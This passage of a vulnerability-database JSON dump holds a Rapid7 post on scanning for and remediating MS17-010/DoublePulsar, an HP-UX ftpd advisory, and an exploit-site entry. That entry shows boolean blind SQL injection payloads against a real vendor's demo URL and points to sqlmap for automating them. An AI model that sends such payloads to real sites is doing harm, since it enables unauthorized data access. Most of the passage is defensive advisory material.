src=\"https://lh3.googleusercontent.com/BJD_-H1-kxX-FMLUb55BsaGLURg3gY4P9sxFn9_7oB2awAqPaLN1cbLCs3PEsJ2QrK07985ezeI_xZfHMeE6RilLuUxtK7md_9HxSEHmvqk0bZa9gmem4ZjBRGd9bnPU7YJe9w1q\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check \"<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>\"</span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh3.googleusercontent.com/L9dJFEgPzRJSWAaKsfK2gH9VMMhDYrYuuK8VGpIwUHDe5yAmjK4Plk37_nyzqsS_nuD2AwsJKfh_5JNH9Kp0zxEJ9MYevzTrp6bJAx-VQvm-i1kzb1JmFAMr6qwB7ROzgf1Uhkrc\"><img class=\"jive-image\" height=\"227\" src=\"https://lh3.googleusercontent.com/L9dJFEgPzRJSWAaKsfK2gH9VMMhDYrYuuK8VGpIwUHDe5yAmjK4Plk37_nyzqsS_nuD2AwsJKfh_5JNH9Kp0zxEJ9MYevzTrp6bJAx-VQvm-i1kzb1JmFAMr6qwB7ROzgf1Uhkrc\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 195 checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0143</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0144</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0145</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0146</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0147</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0148</span></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\">Creating a Dynamic Asset Group for MS17-010</h2><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #231f20;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> c</span><span style=\"font-size: 12pt; font-family: Arial; color: #231f20;\">onsole, just under the search button:</span></p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh6.googleusercontent.com/SOuRrmrhd5X9f64XMtrXQrZGCjf4qyxdeRRfg5aIK7ljeaqGO8wf15wrb5Nj5OaYu5UxW5BEIvrrI3u2ddSjaCYFrr6ly19-_eIkFpqDDFGMQfQm1iVmiV4i2V3S4nDmG9oJeG7u\"><img class=\"jive-image\" height=\"157\" src=\"https://lh6.googleusercontent.com/SOuRrmrhd5X9f64XMtrXQrZGCjf4qyxdeRRfg5aIK7ljeaqGO8wf15wrb5Nj5OaYu5UxW5BEIvrrI3u2ddSjaCYFrr6ly19-_eIkFpqDDFGMQfQm1iVmiV4i2V3S4nDmG9oJeG7u\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\">Creating a DoublePulsar/WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry and DoublePulsar, you could use this Dashboard filter:</span></p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Calibri; color: #000000; background-color: #f6f6f6;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" ORasset.vulnerability.title CONTAINS \"cve-2017-0146\"asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"font-size: 14pt; font-family: Arial; color: #231f20;\">Creating a SQL Query Export</span></h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\">@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: </span><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning & Reporting. This will also apply to DoublePulsar</a>.</span></p><h2 dir=\"ltr\"></h2><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\">Creating a Remediation Project for MS17-010</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\">In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. To do this, go to the “Projects” tab and click “Create a Project”:</span></p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh4.googleusercontent.com/Y-Kj2JX8i-J35zHYwGyxcmHvFVgL7rPui19ePSs5Zl_QRe85OZU2c-gjrk0gcPFSL5xxTMRibzKI91eLRiuYpVqckmb3Qa3MzIH3CbIyNsflCA_wNuc1GZmtQBxJFikXEDeKhdAo\"><img class=\"jive-image\" height=\"144\" src=\"https://lh4.googleusercontent.com/Y-Kj2JX8i-J35zHYwGyxcmHvFVgL7rPui19ePSs5Zl_QRe85OZU2c-gjrk0gcPFSL5xxTMRibzKI91eLRiuYpVqckmb3Qa3MzIH3CbIyNsflCA_wNuc1GZmtQBxJFikXEDeKhdAo\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds <=> ( altId = \"ms17-010\" )\"</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/-0n1zNDDrpFqs58I7XcahTGgFdgo9B3mnA7g2MGqgp2PgNIAP4UoMv5jadxCevG2rrjPkhlj8-ON14Mp4pK0bIUOTwzltWKpH9IaCCLsOd7vyPQ9AymVbRoAMkAdVC_wpqkn5xNI\"><img class=\"jive-image\" height=\"456\" src=\"https://lh5.googleusercontent.com/-0n1zNDDrpFqs58I7XcahTGgFdgo9B3mnA7g2MGqgp2PgNIAP4UoMv5jadxCevG2rrjPkhlj8-ON14Mp4pK0bIUOTwzltWKpH9IaCCLsOd7vyPQ9AymVbRoAMkAdVC_wpqkn5xNI\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now you can give this project a description and configure who is responsible for remediation, as well as access levels if you wish. If you have <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.atlassian.com%2Fsoftware%2Fjira\" rel=\"nofollow\" target=\"_blank\">JIRA</a>, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you’ll be able to quickly scan for the vulnerability that enables both WannaCry and DoublePulsar infections. If you have any questions please don’t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on DoublePulsar, <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar\" target=\"_blank\">please visit this page</a>. </span></p></div><!-- [DocumentBodyEnd:53f4c57c-eea0-4790-a908-f2f47ce880e1] -->", "modified": "2017-06-23T21:23:11", "published": "2017-06-23T21:23:11", "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/23/protecting-against-doublepulsar-infection-with-insightvm-and-nexpose", "id": "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "title": "Protecting against DoublePulsar infection with InsightVM and Nexpose", "type": "rapid7community", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-03-19T15:14:07", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-11-28T00:00:00", "published": "2008-11-28T00:00:00", "id": "1337DAY-ID-4294", "href": "https://0day.today/exploit/description/4294", "type": "zdt", "title": "Ocean12 FAQ Manager Pro (ID) Blind SQL Injection Vulnerabillity", "sourceData": "===============================================================\r\nOcean12 FAQ Manager Pro (ID) Blind SQL Injection Vulnerabillity\r\n===============================================================\r\n\r\n\r\n#########################################################\r\n---------------------------------------------------------\r\nPortal Name: Ocean12 FAQ Manager Pro\r\nAuthor : Mountassif Moad\r\nVulnerability : Blind Sql Injection\r\n---------------------------------------------------------\r\n#########################################################\r\nExploit :\r\nsite.com/?Action=Cat&ID=40%20and%201=1 true\r\nsite.com/?Action=Cat&ID=40%20and%201=0 false\r\nDemo :\r\nhttp://ocean12tech.com/products/faq/demo/?Action=Cat&ID=40%20and%201=1 true\r\nhttp://ocean12tech.com/products/faq/demo/?Action=Cat&ID=40%20and%201=0 false\r\n\r\n# you can exploting the bug white blind sql automatic toolz such as sqlmap or ...\r\n\r\n\r\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/4294"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:26", "bulletinFamily": "software", "description": "Invalid fragmented IP reassembly, some attacks against IIS may pass undetected.", "modified": "2007-07-12T00:00:00", "published": "2007-07-12T00:00:00", "id": "SECURITYVULNS:VULN:7919", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7919", "title": "3COM Tippingpoint multiple protection bypass ways", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:12", "bulletinFamily": "software", "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nHP SECURITY BULLETIN\r\n\r\nHPSBUX01119 REVISION: 0\r\n\r\nSSRT4694 rev.0 - HP-UX ftpd remote unauthorized access\r\n\r\nNOTICE:\r\nThere are no restrictions for distribution of this Security\r\nBulletin provided that it remains complete and intact.\r\n\r\nThe information in this Security Bulletin should be acted upon\r\nas soon as possible.\r\n\r\nINITIAL RELEASE:\r\n23 February 2005\r\n\r\nPOTENTIAL SECURITY IMPACT:\r\nremote unauthorized access\r\n\r\nSOURCE:\r\nHewlett-Packard Company\r\nHP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY:\r\nA potential vulnerability has been identified with HP-UX running\r\nftpd where the vulnerability could be exploited to allow a remote\r\nauthorized user unauthorized access to files.\r\n\r\nREFERENCES:\r\nNone\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP-UX B.11.00, B.11.04, B.11.11, B.11.22, and B.11.23.\r\n\r\nBACKGROUND:\r\n\r\nNote: In addition to the versions of ftp delivered with HP-UX\r\n WU-FTPD 2.6 is available from software.hp.com:\r\n\r\n Overview\r\n WU-FTPD is the FTP daemon for HP-UX systems.\r\n WU-FTPD 2.6.1 is the latest version of WU-FTPD\r\n available on both HP-UX 11.0 and 11i v1 platforms. The\r\n IPv6-enabled version of WU-FTPD is available only on\r\n the HP-UX 11i v1 platform.\r\n\r\n AFFECTED VERSIONS\r\n\r\n Note: To determine if a system has an affected version,\r\n search the output of "swlist -a revision -l fileset"\r\n for an affected fileset. Then determine if the\r\n recommended patch or update is installed.\r\n\r\n HP-UX B.11.23\r\n =============\r\n InternetSrvcs.INETSVCS2-RUN\r\n action: install PHNE_30983 or subsequent.\r\n\r\n HP-UX B.11.22\r\n =============\r\n InternetSrvcs.INETSVCS2-RUN\r\n action: install PHNE_29462 or subsequent.\r\n\r\n HP-UX B.11.11\r\n =============\r\n InternetSrvcs.INETSVCS-RUN\r\n action: install PHNE_30990 or subsequent.\r\n\r\n WUFTP-26.INETSVCS-FTP\r\n action: install revision B.11.11.01.004 or subsequent.\r\n\r\n HP-UX B.11.04\r\n =============\r\n InternetSrvcs.INETSVCS-RUN\r\n action: install PHNE_32813 or subsequent.\r\n\r\n HP-UX B.11.00\r\n =============\r\n InternetSrvcs.INETSVCS-RUN\r\n action: install PHNE_30989 or subsequent.\r\n\r\n WUFTP-26.INETSVCS-FTP\r\n action: install revision B.11.00.01.004 or subsequent.\r\n\r\n\r\n END AFFECTED VERSIONS\r\n\r\nRESOLUTION:\r\nHP has made the following available to resolve the issue:\r\n\r\nHP-UX B.11.11 WU-FTPD 2.6.1 B.11.11.01.004\r\nHP-UX B.11.00 WU-FTPD 2.6.1 B.11.00.01.004\r\n available from http://software.hp.com/\r\n\r\nHP-UX B.11.23 PHNE_30983\r\nHP-UX B.11.22 PHNE_29462\r\nHP-UX B.11.11 PHNE_30990\r\nHP-UX B.11.04 PHNE_32813\r\nHP-UX B.11.00 PHNE_30989\r\n available from http://itrc.hp.com/\r\n\r\nMANUAL ACTIONS: Yes - Update\r\nIf WU-FTPD 2.6 is installed, update to:\r\n\r\nHP-UX B.11.11 WU-FTPD 2.6.1 B.11.11.01.004\r\nHP-UX B.11.00 WU-FTPD 2.6.1 B.11.00.01.004\r\n available from http://software.hp.com/\r\n\r\nBULLETIN REVISION HISTORY:\r\nRevision 0: 23 February 2005\r\n Initial release.\r\n\r\n\r\n\r\nHP-UX SPECIFIC SECURITY BULLETINS*: Security Patch Check revision\r\nB.02.00 analyzes all HP-issued Security Bulletins to provide a\r\nsubset of recommended actions that potentially affect a specific\r\nHP-UX system.\r\n\r\nFor more information:\r\nhttp://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi/\r\ndisplayProductInfo.pl?productNumber=B6834AA\r\n\r\n\r\nSUPPORT: For further information, contact normal HP Services\r\nsupport channel.\r\n\r\nREPORT: To report a potential security vulnerability with any HP\r\nsupported product, send Email to: security-alert@hp.com. It is\r\nstrongly recommended that security related information being\r\ncommunicated to HP be encrypted using PGP, especially exploit\r\ninformation. To obtain the security-alert PGP key please send an\r\ne-mail message to security-alert@hp.com with the Subject of\r\n'get key' (no quotes).\r\n\r\nSUBSCRIBE: To initiate a subscription to receive future HP\r\nSecurity Bulletins via Email:\r\n\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&\r\nlangcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\n\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your IRTC security bulletins and patches\r\n - check ALL categories for which alerts are required and\r\n continue.\r\nUnder Step2: your IRTC operating systems\r\n - verify your operating system selections are checked and\r\n save.\r\n\r\nTo update an existing subscription:\r\nhttp://h30046.www3.hp.com/subSignIn.php\r\n\r\nLog in on the web page\r\n Subscriber's choice for Business: sign-in.\r\nOn the Web page:\r\n Subscriber's Choice: your profile summary\r\n - use Edit Profile to update appropriate sections.\r\n\r\nTo review previously published Security Bulletins visit:\r\nhttp://itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\n relates to is represented by the 5th and 6th characters of the\r\n Bulletin number:\r\n GN = HP General SW,\r\n MA = HP Management Agents,\r\n MI = Misc. 3rd party SW,\r\n MP = HP MPE/iX,\r\n NS = HP NonStop Servers,\r\n OV = HP OpenVMS,\r\n PI = HP Printing & Imaging,\r\n ST = HP Storage SW,\r\n TL = HP Trusted Linux,\r\n TU = HP Tru64 UNIX,\r\n UX = HP-UX,\r\n VV = HP Virtual Vault\r\n\r\nSystem management and security procedures must be reviewed\r\nfrequently to maintain system integrity. HP is continually\r\nreviewing and enhancing the security features of software products\r\nto provide customers with current secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to\r\nbring to the attention of users of the affected HP products the\r\nimportant security information contained in this Bulletin. HP\r\nrecommends that all users determine the applicability of this\r\ninformation to their individual situations and take appropriate\r\naction. HP does not warrant that this information is necessarily\r\naccurate or complete for all user situations and, consequently, HP\r\nwill not be responsible for any damages resulting from user's use\r\nor disregard of the information provided in this Bulletin. To the\r\nextent permitted by law, HP disclaims all warranties, either\r\nexpress or implied, including the warranties of merchantability\r\nand fitness for a particular purpose, title and non-infringement."\r\n\r\n\r\n(c)Copyright 2005 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or\r\neditorial errors or omissions contained herein. The information\r\nprovided is provided "as is" without warranty of any kind. To the\r\nextent permitted by law, neither HP nor its affiliates,\r\nsubcontractors or suppliers will be liable for incidental, special\r\nor consequential damages including downtime cost; lost profits;\r\ndamages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration.\r\nThe information in this document is subject to change without\r\nnotice. Hewlett-Packard Company and the names of Hewlett-Packard\r\nproducts referenced herein are trademarks of Hewlett-Packard\r\nCompany in the United States and other countries. Other product\r\nand company names mentioned herein may be trademarks of their\r\nrespective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 8.1\r\n\r\niQA/AwUBQh3IcuAfOvwtKn1ZEQJn4QCgoQ9wFmICNRszKwdb/XByZmf8AIgAoKr3\r\n+gQwCVo5nf+DTBO7LaTf5vdr\r\n=cbzM\r\n-----END PGP SIGNATURE-----", "modified": "2005-02-25T00:00:00", "published": "2005-02-25T00:00:00", "id": "SECURITYVULNS:DOC:7919", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7919", "title": "[Security Bulletin] SSRT4694 HP-UX ftpd remote unauthorized access", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:18", "bulletinFamily": "software", "description": "Buffer overflow in debug mode, unauthorized files access.", "modified": "2005-02-25T00:00:00", "published": "2005-02-25T00:00:00", "id": "SECURITYVULNS:VULN:4294", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:4294", "title": "HP-UX ftpd FTP server multiple vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}